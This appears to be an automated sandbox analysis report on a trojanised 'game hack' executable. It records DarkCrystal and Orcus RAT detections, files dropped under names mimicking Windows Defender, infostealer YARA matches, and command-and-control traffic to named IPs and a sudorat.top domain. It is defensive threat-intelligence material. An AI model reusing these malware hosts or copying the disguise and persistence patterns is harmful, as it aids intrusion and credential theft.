                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A0A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00A0A5F4
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A1B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00A1B8E0
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A2AAA8 FindFirstFileExA,0_2_00A2AAA8
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EDA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,8_2_00EDA5F4
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EEB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,8_2_00EEB8E0
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EFAAA8 FindFirstFileExA,8_2_00EFAAA8
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile opened: C:\Users\user\AppData\Local\Temp
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile opened: C:\Users\user
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile opened: C:\Users\user\AppData\Local
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile opened: C:\Users\user\Documents\desktop.ini
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile opened: C:\Users\user\AppData
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile opened: C:\Users\user\Desktop\desktop.ini

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:49853 -> 37.44.238.250:80
                      Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:49907 -> 37.44.238.250:80
                      Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:50015 -> 37.44.238.250:80
                      Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49956 -> 37.44.238.250:80
                      Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:50039 -> 37.44.238.250:80
                      Found Tor onion address
                      Source: Solara.exe, 00000009.00000002.2515285033.0000000000401000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: m=nil base SundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondhangupkilledlistensocketPREFIXSTRINGCLAUSEGetAceGetACPsendtoX25519%w%.0wServernetdnsdomaingophertelnetreturn.local.onionip+netCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidicmd/goempty rune1 secretheaderAnswerLengthSTREETavx512rdrandrdseedError: booleanbdoUxXvintegercomplexfloat32float64LButtonRButtonMButtonControlCapitalConvertExecuteNumpad0Numpad1Numpad2Numpad3Numpad4Numpad5Numpad6Numpad7Numpad8Numpad9DecimalNumlockOEMPlusSetMenuUpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTconsolePATHEXT19531259765625avx512finvaliduintptrSwapperChanDir Value>EllipseEndPageFillRgnAbortedpdh.dllIsChildSetRectforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 7.0.MpDefenderProtector.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.7:49702 -> 185.37.62.158:25350
                      Source: Joe Sandbox ViewASN Name: HOSTLANDRU HOSTLANDRU
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: 25350.client.sudorat.top
                      Source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002949000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.000000000316A000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.00000000031C9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002ECA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, runtimesvc.exe, 00000017.00000002.1874336688.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, containerRuntime.exe, 0000001A.00000002.1720636580.00000000025B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002949000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.000000000316A000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.00000000031C9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002ECA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: MpDefenderProtector.exe, 00000007.00000002.1311661641.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or/XmasIes
                      Source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/I(.
                      Source: MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1366464067.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000041DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://taskscheduler.codeplex.com/
                      Source: MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1366464067.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000041DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://taskscheduler.codeplex.com/F
                      Source: Solara.exeBinary or memory string: github.com/lxn/win.getRawInputData

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.unpack, type: UNPACKEDPEMatched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                      Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 7.0.MpDefenderProtector.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                      Source: 7.0.MpDefenderProtector.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                      Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                      Source: 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                      Source: 00000007.00000000.1286933996.0000000000242000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                      Source: Process Memory Space: GameHackBuild1.exe.bin.exe PID: 7292, type: MEMORYSTRMatched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                      Source: Process Memory Space: MpDefenderCoreProtion.exe PID: 7932, type: MEMORYSTRMatched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, type: DROPPEDMatched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, type: DROPPEDMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, type: DROPPEDMatched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, type: DROPPEDMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Yara detected Orcus RAT
                      Source: Yara matchFile source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.MpDefenderProtector.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.1286933996.0000000000242000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: GameHackBuild1.exe.bin.exe PID: 7292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MpDefenderCoreProtion.exe PID: 7932, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, type: DROPPED
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A0718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00A0718C
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Windows\security\database\SSblKNNQege.exe
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Windows\security\database\f2aefc5695405c
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Windows\Cursors\OfficeClickToRun.exe
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Windows\Cursors\e6c9b481da804f
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\9e8d7a4ca61bd9
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\Windows\L2Schemas\SSblKNNQege.exe
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeFile created: C:\Windows\L2Schemas\f2aefc5695405c
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A0857B0_2_00A0857B
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A166460_2_00A16646
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A170BF0_2_00A170BF
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A2D00E0_2_00A2D00E
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A0407E0_2_00A0407E
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A311940_2_00A31194
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A0E2A00_2_00A0E2A0
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A032810_2_00A03281
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A202F60_2_00A202F6
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A027E80_2_00A027E8
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A137C10_2_00A137C1
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A2473A0_2_00A2473A
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A2070E0_2_00A2070E
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A0E8A00_2_00A0E8A0
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A0F9680_2_00A0F968
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A249690_2_00A24969
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A13A3C0_2_00A13A3C
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A16A7B0_2_00A16A7B
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A2CB600_2_00A2CB60
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A20B430_2_00A20B43
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A15C770_2_00A15C77
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A1FDFA0_2_00A1FDFA
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A0ED140_2_00A0ED14
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A13D6D0_2_00A13D6D
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A0BE130_2_00A0BE13
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A0DE6C0_2_00A0DE6C
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A05F3C0_2_00A05F3C
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A20F780_2_00A20F78
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeCode function: 7_2_027D87F07_2_027D87F0
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00ED857B8_2_00ED857B
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EE70BF8_2_00EE70BF
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00ED407E8_2_00ED407E
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EFD00E8_2_00EFD00E
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00F011948_2_00F01194
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EF02F68_2_00EF02F6
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EDE2A08_2_00EDE2A0
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00ED32818_2_00ED3281
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EE66468_2_00EE6646
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00ED27E88_2_00ED27E8
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EE37C18_2_00EE37C1
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EF473A8_2_00EF473A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EF070E8_2_00EF070E
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EDE8A08_2_00EDE8A0
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EDF9688_2_00EDF968
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EF49698_2_00EF4969
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EE6A7B8_2_00EE6A7B
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EE3A3C8_2_00EE3A3C
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EFCB608_2_00EFCB60
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EF0B438_2_00EF0B43
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EE5C778_2_00EE5C77
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EEFDFA8_2_00EEFDFA
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EE3D6D8_2_00EE3D6D
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EDED148_2_00EDED14
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EDDE6C8_2_00EDDE6C
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EDBE138_2_00EDBE13
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00EF0F788_2_00EF0F78
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: 8_2_00ED5F3C8_2_00ED5F3C
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014C1A19_3_0014C1A1
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014BF1A9_3_0014BF1A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014BF1A9_3_0014BF1A
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeCode function: 9_3_0014BF1A9_3_0014BF1A
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeCode function: 13_2_017D87F013_2_017D87F0
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeCode function: 17_2_015787F017_2_015787F0
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: String function: 00A1E28C appears 35 times
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: String function: 00A1ED00 appears 31 times
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: String function: 00A1E360 appears 52 times
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: String function: 00EEE360 appears 52 times
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: String function: 00EEED00 appears 31 times
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: String function: 00EEE28C appears 35 times
                      Source: containerRuntime.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: PxMOoBdB.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: WmQvmhxk.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: mOMkzqHG.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: BpJZMyRc.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: jdhUscxN.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
